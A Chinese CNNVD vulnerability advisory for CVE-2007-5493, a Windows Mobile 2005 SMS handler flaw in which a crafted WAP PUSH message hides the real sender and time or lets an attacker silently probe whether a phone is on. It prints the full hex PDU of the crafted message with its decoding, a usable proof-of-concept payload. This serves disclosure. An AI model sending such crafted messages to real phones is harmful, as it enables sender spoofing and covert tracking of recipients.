漏洞信息详情

Microsoft Windows Mobile短信处理器来源迷惑漏洞

• CNNVD编号：CNNVD-200710-355
• 危害等级： 中危
  
• CVE编号： CVE-2007-5493
• 漏洞类型： 权限许可和访问控制
• 发布时间： 2007-10-17
• 威胁类型： 远程
• 更新时间： 2007-10-24
• 厂        商： microsoft
• 漏洞来源： Ollie Whitehouse ...

漏洞简介

Windows Mobile是微软开发的用于手机的操作系统。

Windows Mobile的短信处理器中存在安全漏洞，如果发送了特制的WAP PUSH消息的话，就可能在接收者的手机上隐藏原始短信的发送者。

原始PDU如[1]所示，以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU，这样发送者的手机号码和发送时间都是错误的。

[1] PDU(自动换行)

079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA

AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62

756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62

696C652E636F6D000101

PDU的解码请见[2]。当SmartPhone接收到这条消息的时候，就会未经交互便将其丢弃，这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。

[2] PDU解码

PDU LENGTH IS 118 BYTES

ADDRESS OF DELIVERING SMSC

NUMBER IS ： +447785016005

TYPE OF NR. ： International

NPI ： ISDN/Telephone (E.164/163)

MESSAGE HEADER FLAGS

MESSAGE TYPE ： SMS SUBMIT

REJECT DUPLICATES ： NO

VALIDITY PERIOD ： RELATIVE

REPLY PATH ： NO

USER DATA HEADER ： PRESENT

REQ. STATUS REPORT ： NO

MSG REFERENCE NR. ： 34 (0x22)

DESTINATION ADDRESS

NUMBER IS ： +447716299660

TYPE OF NR. ： International

NPI ： ISDN/Telephone (E.164/163)

PROTOCOL IDENTIFIER (0x00)

MESSAGE ENTITIES ： SME-to-SME

PROTOCOL USED ： Implicit / SC-specific

DATA CODING SCHEME (0x04)

AUTO-DELETION ： OFF

COMPRESSION ： OFF

MESSAGE CLASS ： NONE

ALPHABET USED ： 8bit data

VALIDITY OF MESSAGE ： 24.0 hrs

USER DATA PART OF SM

USER DATA LENGTH ： 96 octets

UDH LENGTH ： 6 octets

UDH ： 05 04 0B 84 23 F0

UDH ELEMENTS ： 05 - Appl. port addressing 16bit

4 (0x04) Bytes Information Element

09200 ： SOURCE port is： allocated by IANA

02948 ： DESTINATION port is： allocated by IANA

--- DATA ----------------------

05 04 0B 84 23 F0

USER DATA (TEXT) ： \\%＆reg;＆＃129;ê＆macr;＆＃8218;＆acute;＆＃8222;jE＆AElig;

symantec…Symantec

bulkSMS (Unregistered Ver) -

LogixMobile.com

漏洞公告

目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.microsoft.com/technet/security/

参考网址

来源: MISC

链接:http://www.symantec.com/content/en/us/enterprise/research/SYMSA-2007-011.txt

来源: BID

名称: 26091

链接:http://www.securityfocus.com/bid/26091

来源: BUGTRAQ

名称: 20071017 SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue

链接:http://www.securityfocus.com/archive/1/archive/1/482446/100/0/threaded

来源: OSVDB

名称: 45517

链接:http://osvdb.org/45517

来源: XF

名称: win-mobile-sms-obfuscation(37249)

链接:http://xforce.iss.net/xforce/xfdb/37249

来源: SECTRACK

名称: 1018832

链接:http://securitytracker.com/id?1018832

受影响实体

• Microsoft Windows_mobile:2005  

补丁

暂无